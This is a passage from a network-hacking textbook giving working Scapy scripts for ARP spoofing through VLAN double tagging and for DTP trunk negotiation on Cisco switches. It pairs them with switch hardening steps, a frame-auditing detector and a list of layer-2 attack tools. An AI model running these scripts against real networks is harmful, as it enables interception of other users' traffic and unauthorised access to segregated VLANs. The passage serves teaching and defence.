Understanding Network Hacks

4.7 ARP Spoofing Over VLAN Hopping

VLANs confine broadcast traffic to the ports of the same VLAN, so by default we never see the ARP requests of a host in another VLAN and cannot answer them. Instead we have to tell the victim our MAC proactively every few seconds, as in the first ARP spoofing example. The code is identical except that we tag every packet twice: first with our own VLAN and then with the destination VLAN. This double tagging only works if our VLAN is the native VLAN of the trunk leading to the next switch: the first switch strips the outer (native) tag, forwards the frame over the trunk with the inner tag still in place, and the second switch delivers it into the target VLAN. The trick is one-directional, nothing from the target VLAN finds its way back to us the same way, which is why the script sends unsolicited "is-at" replies instead of waiting for requests.

#!/usr/bin/python

import sys
import time
from scapy.all import sendp, ARP, Ether, Dot1Q

if len(sys.argv) < 3:
    print(sys.argv[0] + " <target_ip> <fake_ip>")
    sys.exit()

iface = "eth0"
target_ip = sys.argv[1]          # victim in the other VLAN
fake_ip = sys.argv[2]            # IP we claim to own, e.g. the victim's gateway
fake_mac = 'c0:d3:de:ad:be:ef'
our_vlan = 1                     # must be the native VLAN of the trunk
target_vlan = 2

# Outer tag: our (native) VLAN, stripped by the first switch.
# Inner tag: survives the trunk and puts the frame into the target VLAN.
packet = Ether() / \
         Dot1Q(vlan=our_vlan) / \
         Dot1Q(vlan=target_vlan) / \
         ARP(hwsrc=fake_mac,
             pdst=target_ip,
             psrc=fake_ip,
             op="is-at")

# No request ever reaches us from the other VLAN, so keep re-poisoning.
while True:
    sendp(packet, iface=iface)
    time.sleep(10)

Luckily it is not that complicated to protect against this kind of VLAN attack: if you really need to separate networks, use physically separate switches. Short of that, the double-tagging trick depends on the attacker's access VLAN being the native VLAN of a trunk, so moving the native VLAN of every trunk to a dedicated, otherwise unused VLAN and tagging native traffic on trunks (vlan dot1q tag native on Cisco IOS) removes the precondition.

4.8 DTP Abusing

DTP (Dynamic Trunking Protocol) is a Cisco proprietary protocol that lets two switches negotiate whether the link between them should become a trunk. A trunk port normally interconnects switches and routers and carries some or all of the VLANs the switch knows, each frame tagged with its VLAN ID.

The following code needs the DTP contrib module of Scapy. At the time of writing it was only available in the development version; current Scapy releases ship scapy.contrib.dtp, so with a recent pip-installed Scapy this step can be skipped (the project has since moved from Mercurial to Git on GitHub as well). To check out the sources as described here, first install Mercurial and then clone the Scapy repository:

hg clone scapy

If you want to keep up with the latest version of Scapy, you only have to update the checkout from time to time:

cd scapy
hg pull

Now you can replace the old version of Scapy with the latest and greatest:

pip uninstall Scapy
cd scapy
python install

DTP has no authentication whatsoever, so a single dynamic-desirable packet sent to any DTP-enabled Cisco port asks the switch to turn our port into a trunk, and the switch obliges. This works whenever the port is left in one of the dynamic modes (dynamic auto or dynamic desirable), which was the factory default on many Cisco switches; a port hard-set to access mode ignores the request.

#!/usr/bin/python

import sys
from scapy.contrib.dtp import negotiate_trunk

if len(sys.argv) < 2:
    print(sys.argv[0] + " <dev> [spoofed_mac]")
    sys.exit()

# Sends a DTP dynamic-desirable frame on <dev>. The optional MAC is the
# identity of the neighbor switch we pretend to be; without it a random
# one is generated.
if len(sys.argv) > 2:
    negotiate_trunk(iface=sys.argv[1], mac=sys.argv[2])
else:
    negotiate_trunk(iface=sys.argv[1])

As an optional parameter you can pass the MAC address of the spoofed neighbor switch; if none is given, a random one is generated.

The negotiation can take a few minutes, but an attacker does not mind the delay, because the reward is a trunk port and with it access to every VLAN the switch carries. Once the port trunks, create a tagged subinterface for each VLAN of interest and give it an address in that VLAN:

vconfig add eth0 <vlan-id>
ifconfig eth0.<vlan-id> <ip_of_vlan> up

On current Linux systems vconfig and ifconfig are replaced by ip:

ip link add link eth0 name eth0.<vlan-id> type vlan id <vlan-id>
ip addr add <ip_of_vlan>/<prefix> dev eth0.<vlan-id>
ip link set eth0.<vlan-id> up

There is no really good reason to use DTP, so just disable it: on Cisco IOS, configure host-facing ports with switchport mode access and ports that must trunk with switchport mode trunk plus switchport nonegotiate, so that no port ever answers a negotiation request. Verify with show interfaces switchport that no port still reports a dynamic administrative mode.
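As an added example (not code from the book), here is a defender's counterpart to both scripts above: a standard-library Python audit that parses raw Ethernet frames seen on an access port and flags the two indicators from Sects. 4.7 and 4.8, stacked 802.1Q tags and DTP negotiation frames. It builds the sample frames it checks, so it runs offline. The frame layouts are the public 802.1Q and DTP (LLC/SNAP, Cisco OUI, PID 0x2004, version 1, TLVs) formats; the decoding of the DTP status byte follows the Wireshark and Yersinia dissectors, and the MAC and IP addresses in the samples are constructed for the example.

```python
import struct

TPID_8021Q, TPID_8021AD = 0x8100, 0x88A8     # C-tag and QinQ S-tag, both stack the same way
ETHERTYPE_ARP = 0x0806
DTP_MULTICAST = "01:00:0c:cc:cc:cc"
# LLC (SNAP) + Cisco OUI + DTP protocol id + DTP version 1
DTP_SNAP_HDR = b"\xaa\xaa\x03\x00\x00\x0c" + struct.pack("!H", 0x2004) + b"\x01"
# Status byte: bit 7 = trunking active, low bits = admin mode. Names follow the
# Wireshark/Yersinia dissectors; 0x03 is the "desirable" probe the attack script sends.
DTP_ADMIN = {1: "on", 2: "off", 3: "desirable", 4: "auto"}

def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))

def mac_str(raw):
    return ":".join("%02x" % b for b in raw)

def build_tagged_frame(dst, src, vids, ethertype, payload):
    """Ethernet II frame with zero or more stacked 802.1Q tags, outermost first."""
    hdr = mac_bytes(dst) + mac_bytes(src)
    for vid in vids:
        hdr += struct.pack("!HH", TPID_8021Q, vid & 0x0FFF)       # PCP = 0, DEI = 0
    return hdr + struct.pack("!H", ethertype) + payload

def build_dtp_frame(src, domain=b"", status=0x03, neighbor=None):
    """802.3/LLC/SNAP DTP frame; the defaults mirror a dynamic-desirable probe."""
    body = struct.pack("!HH", 1, 4 + len(domain)) + domain          # TLV 1: VTP domain
    body += struct.pack("!HHB", 2, 5, status)                        # TLV 2: status
    body += struct.pack("!HHB", 3, 5, 0xA5)                          # TLV 3: encapsulation type
    body += struct.pack("!HH", 4, 10) + mac_bytes(neighbor or src)   # TLV 4: sender id
    payload = DTP_SNAP_HDR + body
    return mac_bytes(DTP_MULTICAST) + mac_bytes(src) + struct.pack("!H", len(payload)) + payload

def parse_vlan_tags(frame):
    """Return (VLAN ids outermost first, ethertype or 802.3 length, payload offset)."""
    off, vids = 12, []
    while True:
        if len(frame) < off + 2:
            raise ValueError("truncated frame")
        (tpid,) = struct.unpack_from("!H", frame, off)
        if tpid not in (TPID_8021Q, TPID_8021AD):
            return vids, tpid, off + 2
        if len(frame) < off + 4:
            raise ValueError("truncated VLAN tag")
        vids.append(struct.unpack_from("!H", frame, off + 2)[0] & 0x0FFF)
        off += 4

def parse_dtp(frame):
    """Decode the DTP TLVs of a frame, or return None if it is not DTP."""
    if len(frame) < 14 or mac_str(frame[:6]) != DTP_MULTICAST:
        return None
    vids, length, off = parse_vlan_tags(frame)
    if length > 1500 or frame[off:off + 9] != DTP_SNAP_HDR:      # 802.3 length, LLC/SNAP, DTP, v1
        return None
    off += 9
    info = {"src": mac_str(frame[6:12]), "vlans": vids}
    while off + 4 <= len(frame):
        ttype, tlen = struct.unpack_from("!HH", frame, off)
        if tlen < 4 or off + tlen > len(frame):
            raise ValueError("bad DTP TLV")
        val = frame[off + 4:off + tlen]
        if ttype == 1:
            info["domain"] = val.rstrip(b"\x00").decode("ascii", "replace")
        elif ttype == 2 and val:
            info["trunking"] = bool(val[0] & 0x80)
            info["admin"] = DTP_ADMIN.get(val[0] & 0x07, "unknown")
        elif ttype == 4 and len(val) == 6:
            info["neighbor"] = mac_str(val)
        off += tlen
    return info

def audit_access_port(frames):
    """Findings for frames seen on a port that should carry untagged host traffic only."""
    findings = []
    for i, frame in enumerate(frames):
        vids, _, _ = parse_vlan_tags(frame)
        if len(vids) >= 2:
            findings.append((i, "double-tagged frame, VLANs %s: 802.1Q hopping attempt" % vids))
        elif vids:
            findings.append((i, "tagged frame for VLAN %d on an access port" % vids[0]))
        dtp = parse_dtp(frame)
        if dtp is not None:
            findings.append((i, "DTP %s from %s: trunk negotiation reaches a host port"
                             % (dtp.get("admin", "?"), dtp["src"])))
    return findings

# Constructed sample frames: what the two scripts of this chapter put on the wire.
ATTACKER_MAC = "c0:d3:de:ad:be:ef"
ARP_IS_AT = (b"\x00\x01\x08\x00\x06\x04\x00\x02" + mac_bytes(ATTACKER_MAC)   # ARP reply, sender MAC
             + b"\x0a\x00\x02\x01" + b"\x00" * 6 + b"\x0a\x00\x02\x0a")     # fake_ip, target MAC/IP
SAMPLE_FRAMES = [
    build_tagged_frame("ff:ff:ff:ff:ff:ff", ATTACKER_MAC, [], ETHERTYPE_ARP, ARP_IS_AT),      # plain ARP
    build_tagged_frame("ff:ff:ff:ff:ff:ff", ATTACKER_MAC, [1, 2], ETHERTYPE_ARP, ARP_IS_AT),  # Sect. 4.7
    build_dtp_frame(ATTACKER_MAC),                                                            # Sect. 4.8
]
```

To run it against real traffic, replace SAMPLE_FRAMES with frames from a capture (for example bytes(pkt) for each packet of Scapy's rdpcap). Every hit is actionable: a tagged frame means the port is not really an access port or a host is crafting tags itself, and a DTP frame from a host means negotiation is still enabled on that port.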

4.9 Tools

4.9.1 NetCommander

NetCommander is a simple ARP spoofer. It finds active computers on the network by sending ARP requests to every possible IP. Afterwards you can choose a connection to hijack, and NetCommander spoofs the connection between that host and the default gateway in both directions every few seconds.

The source code of the tool can be downloaded from NetCommander

4.9.2 Hacker's Hideaway ARP Attack Tool

Hacker's Hideaway ARP Attack Tool has a few more features than NetCommander. Apart from the spoofing of a specific connection it supports passive spoofing of all ARP requests of a source IP as well as MAC flooding.

The download link of the tool is tar.bz2

4.9.3 Loki

Loki is a layer 2 and 3 attack tool like Yersinia. It can be extended by plugins and has a nice GUI. It implements attacks like ARP spoofing and flooding, BGP and RIP route injection and even attacks on quite uncommon protocols like HSRP and VRRP.

The source code of Loki can be grabbed from the site html.
